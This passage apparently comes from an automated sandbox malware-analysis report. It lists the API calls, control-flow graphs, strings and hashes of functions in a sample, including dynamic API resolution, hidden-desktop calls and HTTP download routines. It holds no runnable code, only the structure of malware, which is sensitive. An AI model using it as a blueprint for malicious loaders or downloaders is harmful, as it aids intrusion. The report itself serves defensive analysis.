                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: e0b4af44eb81a0f583a1d56c2f4b7b56f860ebb3021fc77b8b3bb755654be5de
                                • Instruction ID: ae74e561940e3683f005609c7cc4b1137980406867d75de874c6174146ba49ab
                                • Opcode Fuzzy Hash: e0b4af44eb81a0f583a1d56c2f4b7b56f860ebb3021fc77b8b3bb755654be5de
                                • Instruction Fuzzy Hash: BFF054B1A44654ABD710DF98DD49F9EBBBCF745B21F100216F915E3780D774190486E1
                                Function 009D66E0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 633 9d66e0-9d66e7 634 9d66ed-9d6af9 GetProcAddress * 43 633->634 635 9d6afe-9d6b92 LoadLibraryA * 8 633->635 634->635 636 9d6c08-9d6c0f 635->636 637 9d6b94-9d6c03 GetProcAddress * 5 635->637 638 9d6c15-9d6ccd GetProcAddress * 8 636->638 639 9d6cd2-9d6cd9 636->639 637->636 638->639 640 9d6d4f-9d6d56 639->640 641 9d6cdb-9d6d4a GetProcAddress * 5 639->641 642 9d6d5c-9d6de4 GetProcAddress * 6 640->642 643 9d6de9-9d6df0 640->643 641->640 642->643 644 9d6df6-9d6f0b GetProcAddress * 12 643->644 645 9d6f10-9d6f17 643->645 644->645 646 9d6f8d-9d6f94 645->646 647 9d6f19-9d6f88 GetProcAddress * 5 645->647 648 9d6f96-9d6fbc GetProcAddress * 2 646->648 649 9d6fc1-9d6fc8 646->649 647->646 648->649 650 9d6fca-9d6ff0 GetProcAddress * 2 649->650 651 9d6ff5-9d6ffc 649->651 650->651 652 9d70ed-9d70f4 651->652 653 9d7002-9d70e8 GetProcAddress * 10 651->653 654 9d70f6-9d714d GetProcAddress * 4 652->654 655 9d7152-9d7159 652->655 653->652 654->655 656 9d716e-9d7175 655->656 657 9d715b-9d7169 GetProcAddress 655->657 658 9d7177-9d71ce GetProcAddress * 4 656->658 659 9d71d3 656->659 657->656 658->659
                                APIs
                                • GetProcAddress.KERNEL32(77190000,010B5350), ref: 009D66F5
                                • GetProcAddress.KERNEL32(77190000,010B53D0), ref: 009D670D
                                • GetProcAddress.KERNEL32(77190000,010C9068), ref: 009D6726
                                • GetProcAddress.KERNEL32(77190000,010C8FF0), ref: 009D673E
                                • GetProcAddress.KERNEL32(77190000,010C9080), ref: 009D6756
                                • GetProcAddress.KERNEL32(77190000,010CD460), ref: 009D676F
                                • GetProcAddress.KERNEL32(77190000,010BA528), ref: 009D6787
                                • GetProcAddress.KERNEL32(77190000,010CD610), ref: 009D679F
                                • GetProcAddress.KERNEL32(77190000,010CD730), ref: 009D67B8
                                • GetProcAddress.KERNEL32(77190000,010CD508), ref: 009D67D0
                                • GetProcAddress.KERNEL32(77190000,010CD5E0), ref: 009D67E8
                                • GetProcAddress.KERNEL32(77190000,010B55B0), ref: 009D6801
                                • GetProcAddress.KERNEL32(77190000,010B5410), ref: 009D6819
                                • GetProcAddress.KERNEL32(77190000,010B55F0), ref: 009D6831
                                • GetProcAddress.KERNEL32(77190000,010B5470), ref: 009D684A
                                • GetProcAddress.KERNEL32(77190000,010CD640), ref: 009D6862
                                • GetProcAddress.KERNEL32(77190000,010CD448), ref: 009D687A
                                • GetProcAddress.KERNEL32(77190000,010BA898), ref: 009D6893
                                • GetProcAddress.KERNEL32(77190000,010B5530), ref: 009D68AB
                                • GetProcAddress.KERNEL32(77190000,010CD4A8), ref: 009D68C3
                                • GetProcAddress.KERNEL32(77190000,010CD6A0), ref: 009D68DC
                                • GetProcAddress.KERNEL32(77190000,010CD6E8), ref: 009D68F4
                                • GetProcAddress.KERNEL32(77190000,010CD568), ref: 009D690C
                                • GetProcAddress.KERNEL32(77190000,010B56B0), ref: 009D6925
                                • GetProcAddress.KERNEL32(77190000,010CD628), ref: 009D693D
                                • GetProcAddress.KERNEL32(77190000,010CD5B0), ref: 009D6955
                                • GetProcAddress.KERNEL32(77190000,010CD700), ref: 009D696E
                                • GetProcAddress.KERNEL32(77190000,010CD478), ref: 009D6986
                                • GetProcAddress.KERNEL32(77190000,010CD490), ref: 009D699E
                                • GetProcAddress.KERNEL32(77190000,010CD4F0), ref: 009D69B7
                                • GetProcAddress.KERNEL32(77190000,010CD580), ref: 009D69CF
                                • GetProcAddress.KERNEL32(77190000,010CD4C0), ref: 009D69E7
                                • GetProcAddress.KERNEL32(77190000,010CD4D8), ref: 009D6A00
                                • GetProcAddress.KERNEL32(77190000,010BFDD8), ref: 009D6A18
                                • GetProcAddress.KERNEL32(77190000,010CD718), ref: 009D6A30
                                • GetProcAddress.KERNEL32(77190000,010CD658), ref: 009D6A49
                                • GetProcAddress.KERNEL32(77190000,010B5610), ref: 009D6A61
                                • GetProcAddress.KERNEL32(77190000,010CD670), ref: 009D6A79
                                • GetProcAddress.KERNEL32(77190000,010B5630), ref: 009D6A92
                                • GetProcAddress.KERNEL32(77190000,010CD520), ref: 009D6AAA
                                • GetProcAddress.KERNEL32(77190000,010CD688), ref: 009D6AC2
                                • GetProcAddress.KERNEL32(77190000,010B5670), ref: 009D6ADB
                                • GetProcAddress.KERNEL32(77190000,010B5690), ref: 009D6AF3
                                • LoadLibraryA.KERNEL32(010CD538,009D051F), ref: 009D6B05
                                • LoadLibraryA.KERNEL32(010CD5C8), ref: 009D6B16
                                • LoadLibraryA.KERNEL32(010CD6B8), ref: 009D6B28
                                • LoadLibraryA.KERNEL32(010CD6D0), ref: 009D6B3A
                                • LoadLibraryA.KERNEL32(010CD550), ref: 009D6B4B
                                • LoadLibraryA.KERNEL32(010CD598), ref: 009D6B5D
                                • LoadLibraryA.KERNEL32(010CD5F8), ref: 009D6B6F
                                • LoadLibraryA.KERNEL32(010CD790), ref: 009D6B80
                                • GetProcAddress.KERNEL32(77040000,010B52D0), ref: 009D6B9C
                                • GetProcAddress.KERNEL32(77040000,010CD868), ref: 009D6BB4
                                • GetProcAddress.KERNEL32(77040000,010C8C08), ref: 009D6BCD
                                • GetProcAddress.KERNEL32(77040000,010CD880), ref: 009D6BE5
                                • GetProcAddress.KERNEL32(77040000,010B5150), ref: 009D6BFD
                                • GetProcAddress.KERNEL32(73CA0000,010BA780), ref: 009D6C1D
                                • GetProcAddress.KERNEL32(73CA0000,010B5170), ref: 009D6C35
                                • GetProcAddress.KERNEL32(73CA0000,010BA7F8), ref: 009D6C4E
                                • GetProcAddress.KERNEL32(73CA0000,010CD898), ref: 009D6C66
                                • GetProcAddress.KERNEL32(73CA0000,010CD748), ref: 009D6C7E
                                • GetProcAddress.KERNEL32(73CA0000,010B51D0), ref: 009D6C97
                                • GetProcAddress.KERNEL32(73CA0000,010B4F50), ref: 009D6CAF
                                • GetProcAddress.KERNEL32(73CA0000,010CD8B0), ref: 009D6CC7
                                • GetProcAddress.KERNEL32(768D0000,010B51B0), ref: 009D6CE3
                                • GetProcAddress.KERNEL32(768D0000,010B4FD0), ref: 009D6CFB
                                • GetProcAddress.KERNEL32(768D0000,010CD8C8), ref: 009D6D14
                                • GetProcAddress.KERNEL32(768D0000,010CD760), ref: 009D6D2C
                                • GetProcAddress.KERNEL32(768D0000,010B51F0), ref: 009D6D44
                                • GetProcAddress.KERNEL32(75790000,010BA550), ref: 009D6D64
                                • GetProcAddress.KERNEL32(75790000,010BA820), ref: 009D6D7C
                                • GetProcAddress.KERNEL32(75790000,010CD820), ref: 009D6D95
                                • GetProcAddress.KERNEL32(75790000,010B5190), ref: 009D6DAD
                                • GetProcAddress.KERNEL32(75790000,010B5210), ref: 009D6DC5
                                • GetProcAddress.KERNEL32(75790000,010BA848), ref: 009D6DDE
                                • GetProcAddress.KERNEL32(75A10000,010CD7C0), ref: 009D6DFE
                                • GetProcAddress.KERNEL32(75A10000,010B52B0), ref: 009D6E16
                                • GetProcAddress.KERNEL32(75A10000,010C8BD8), ref: 009D6E2F
                                • GetProcAddress.KERNEL32(75A10000,010CD8F8), ref: 009D6E47
                                • GetProcAddress.KERNEL32(75A10000,010CD778), ref: 009D6E5F
                                • GetProcAddress.KERNEL32(75A10000,010B5330), ref: 009D6E78
                                • GetProcAddress.KERNEL32(75A10000,010B4F70), ref: 009D6E90
                                • GetProcAddress.KERNEL32(75A10000,010CD7A8), ref: 009D6EA8
                                • GetProcAddress.KERNEL32(75A10000,010CD8E0), ref: 009D6EC1
                                • GetProcAddress.KERNEL32(75A10000,CreateDesktopA), ref: 009D6ED7
                                • GetProcAddress.KERNEL32(75A10000,OpenDesktopA), ref: 009D6EEE
                                • GetProcAddress.KERNEL32(75A10000,CloseDesktop), ref: 009D6F05
                                • GetProcAddress.KERNEL32(76850000,010B5050), ref: 009D6F21
                                • GetProcAddress.KERNEL32(76850000,010CD7D8), ref: 009D6F39
                                • GetProcAddress.KERNEL32(76850000,010CD7F0), ref: 009D6F52
                                • GetProcAddress.KERNEL32(76850000,010CD808), ref: 009D6F6A
                                • GetProcAddress.KERNEL32(76850000,010CD838), ref: 009D6F82
                                • GetProcAddress.KERNEL32(75690000,010B4F90), ref: 009D6F9E
                                • GetProcAddress.KERNEL32(75690000,010B50D0), ref: 009D6FB6
                                • GetProcAddress.KERNEL32(769C0000,010B50B0), ref: 009D6FD2
                                • GetProcAddress.KERNEL32(769C0000,010CD850), ref: 009D6FEA
                                • GetProcAddress.KERNEL32(6F8C0000,010B52F0), ref: 009D700A
                                • GetProcAddress.KERNEL32(6F8C0000,010B5090), ref: 009D7022
                                • GetProcAddress.KERNEL32(6F8C0000,010B5030), ref: 009D703B
                                • GetProcAddress.KERNEL32(6F8C0000,010CD2C8), ref: 009D7053
                                • GetProcAddress.KERNEL32(6F8C0000,010B5230), ref: 009D706B
                                • GetProcAddress.KERNEL32(6F8C0000,010B5070), ref: 009D7084
                                • GetProcAddress.KERNEL32(6F8C0000,010B5250), ref: 009D709C
                                • GetProcAddress.KERNEL32(6F8C0000,010B50F0), ref: 009D70B4
                                • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 009D70CB
                                • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 009D70E2
                                • GetProcAddress.KERNEL32(75D90000,010CD3E8), ref: 009D70FE
                                • GetProcAddress.KERNEL32(75D90000,010C8BA8), ref: 009D7116
                                • GetProcAddress.KERNEL32(75D90000,010CD238), ref: 009D712F
                                • GetProcAddress.KERNEL32(75D90000,010CD2E0), ref: 009D7147
                                • GetProcAddress.KERNEL32(76470000,010B4FB0), ref: 009D7163
                                • GetProcAddress.KERNEL32(6D760000,010CD1F0), ref: 009D717F
                                • GetProcAddress.KERNEL32(6D760000,010B5270), ref: 009D7197
                                • GetProcAddress.KERNEL32(6D760000,010CD3D0), ref: 009D71B0
                                • GetProcAddress.KERNEL32(6D760000,010CD1C0), ref: 009D71C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                • API String ID: 2238633743-3468015613
                                • Opcode ID: 79a4d2a3d4f5676488ca0fadeca6fee1f3370479ed342a349e89ebce5a8d9996
                                • Instruction ID: a89cb77d6c9d9c2ab056a51f7a6df4c2585f436ff569a308931e935dec79aad9
                                • Opcode Fuzzy Hash: 79a4d2a3d4f5676488ca0fadeca6fee1f3370479ed342a349e89ebce5a8d9996
                                • Instruction Fuzzy Hash: 036263F5610A80AFD754DF65EDC8A2637BAFB883013508919E95ACB371DF34A908DF60
                                Function 009CF1B0 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(009DCFEC), ref: 009CF1D5
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009CF1F1
                                • lstrlen.KERNEL32(009DCFEC), ref: 009CF1FC
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009CF215
                                • lstrlen.KERNEL32(009DCFEC), ref: 009CF220
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009CF239
                                • lstrcpy.KERNEL32(00000000,009E4FA0), ref: 009CF25E
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009CF28C
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009CF2C0
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009CF2F0
                                • lstrlen.KERNEL32(010B55D0), ref: 009CF315
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: 1147b0883611fbe25f5ecb09f926001d95f38e7b36b4791c577691a322db10b6
                                • Instruction ID: d502df5d0a1d0688c45a4c496a9c2c94e71841e1cfb2e6fc88a285b9972c5fe7
                                • Opcode Fuzzy Hash: 1147b0883611fbe25f5ecb09f926001d95f38e7b36b4791c577691a322db10b6
                                • Instruction Fuzzy Hash: 69A26C70D012469FDB24DF65CA98B5ABBFAAF44310B18807DE809EB3A1DB35DC45CB52
                                Function 009CFFD0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009D0013
                                • lstrlen.KERNEL32(009DCFEC), ref: 009D00BD
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009D00E1
                                • lstrlen.KERNEL32(009DCFEC), ref: 009D00EC
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009D0110
                                • lstrlen.KERNEL32(009DCFEC), ref: 009D011B
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009D013F
                                • lstrlen.KERNEL32(009DCFEC), ref: 009D015A
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009D0189
                                • lstrlen.KERNEL32(009DCFEC), ref: 009D0194
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009D01C3
                                • lstrlen.KERNEL32(009DCFEC), ref: 009D01CE
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009D0206
                                • lstrlen.KERNEL32(009DCFEC), ref: 009D0250
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009D0288
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D059B
                                • lstrlen.KERNEL32(010B5510), ref: 009D05AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D05D7
                                • lstrcat.KERNEL32(00000000,?), ref: 009D05E3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D060E
                                • lstrlen.KERNEL32(010CEE70), ref: 009D0625
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D064C
                                • lstrcat.KERNEL32(00000000,?), ref: 009D0658
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D0681
                                • lstrlen.KERNEL32(010B5590), ref: 009D0698
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D06C9
                                • lstrcat.KERNEL32(00000000,?), ref: 009D06D5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D0706
                                • lstrcpy.KERNEL32(00000000,010C8AD8), ref: 009D074B
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B1557
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B1579
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B159B
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B15FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D077F
                                • lstrcpy.KERNEL32(00000000,010CED80), ref: 009D07E7
                                • lstrcpy.KERNEL32(00000000,010C8958), ref: 009D0858
                                • lstrcpy.KERNEL32(00000000,fplugins), ref: 009D08CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D0928
                                • lstrcpy.KERNEL32(00000000,010C88C8), ref: 009D09F8
                                  • Part of subcall function 009B24E0: lstrcpy.KERNEL32(00000000,?), ref: 009B2528
                                  • Part of subcall function 009B24E0: lstrcpy.KERNEL32(00000000,?), ref: 009B254E
                                  • Part of subcall function 009B24E0: lstrcpy.KERNEL32(00000000,?), ref: 009B2577
                                • lstrcpy.KERNEL32(00000000,010C8918), ref: 009D0ACE
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D0B81
                                • lstrcpy.KERNEL32(00000000,010C8918), ref: 009D0D58
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID: fplugins
                                • API String ID: 2500673778-38756186
                                • Opcode ID: 491c95bdec6ee8dbe509cb066482019ebb5d459d9659f581b8d690c867715527
                                • Instruction ID: 21f860aeeaeae282b78fdf850abb08e9081fcf2106e0967f5959c7db1d6c3453
                                • Opcode Fuzzy Hash: 491c95bdec6ee8dbe509cb066482019ebb5d459d9659f581b8d690c867715527
                                • Instruction Fuzzy Hash: 64E26971A053418FD724DF29C588BAABBE4BF88314F58C56EE48D8B362DB31D845CB52
                                Function 009B6C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2234 9b6c40-9b6c64 call 9b2930 2237 9b6c66-9b6c6b 2234->2237 2238 9b6c75-9b6c97 call 9b4bc0 2234->2238 2237->2238 2239 9b6c6d-9b6c6f lstrcpy 2237->2239 2242 9b6caa-9b6cba call 9b2930 2238->2242 2243 9b6c99 2238->2243 2239->2238 2247 9b6cc8-9b6cf5 InternetOpenA StrCmpCA 2242->2247 2248 9b6cbc-9b6cc2 lstrcpy 2242->2248 2244 9b6ca0-9b6ca8 2243->2244 2244->2242 2244->2244 2249 9b6cfa-9b6cfc 2247->2249 2250 9b6cf7 2247->2250 2248->2247 2251 9b6ea8-9b6ebb call 9b2930 2249->2251 2252 9b6d02-9b6d22 InternetConnectA 2249->2252 2250->2249 2261 9b6ec9-9b6ee0 call 9b2a20 * 2 2251->2261 2262 9b6ebd-9b6ebf 2251->2262 2253 9b6d28-9b6d5d HttpOpenRequestA 2252->2253 2254 9b6ea1-9b6ea2 InternetCloseHandle 2252->2254 2256 9b6d63-9b6d65 2253->2256 2257 9b6e94-9b6e9e InternetCloseHandle 2253->2257 2254->2251 2259 9b6d7d-9b6dad HttpSendRequestA HttpQueryInfoA 2256->2259 2260 9b6d67-9b6d77 InternetSetOptionA 2256->2260 2257->2254 2263 9b6daf-9b6dd3 call 9d71e0 call 9b2a20 * 2 2259->2263 2264 9b6dd4-9b6de4 call 9d3d90 2259->2264 2260->2259 2262->2261 2265 9b6ec1-9b6ec3 lstrcpy 2262->2265 2264->2263 2273 9b6de6-9b6de8 2264->2273 2265->2261 2276 9b6dee-9b6e07 InternetReadFile 2273->2276 2277 9b6e8d-9b6e8e InternetCloseHandle 2273->2277 2276->2277 2279 9b6e0d 2276->2279 2277->2257 2281 9b6e10-9b6e15 2279->2281 2281->2277 2283 9b6e17-9b6e3d call 9d7310 2281->2283 2286 9b6e3f call 9b2a20 2283->2286 2287 9b6e44-9b6e51 call 9b2930 2283->2287 2286->2287 2291 9b6e53-9b6e57 2287->2291 2292 9b6e61-9b6e8b call 9b2a20 InternetReadFile 2287->2292 2291->2292 2294 9b6e59-9b6e5b lstrcpy 2291->2294 2292->2277 2292->2281 2294->2292
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B6C6F
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B6CC2
                                • InternetOpenA.WININET(009DCFEC,00000001,00000000,00000000,00000000), ref: 009B6CD5
                                • StrCmpCA.SHLWAPI(?,010CF498), ref: 009B6CED
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009B6D15
                                • HttpOpenRequestA.WININET(00000000,GET,?,010CEEB8,00000000,00000000,-00400100,00000000), ref: 009B6D50
                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 009B6D77
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009B6D86
                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 009B6DA5
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 009B6DFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B6E5B
                                • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 009B6E7D
                                • InternetCloseHandle.WININET(00000000), ref: 009B6E8E
                                • InternetCloseHandle.WININET(?), ref: 009B6E98
                                • InternetCloseHandle.WININET(00000000), ref: 009B6EA2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B6EC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
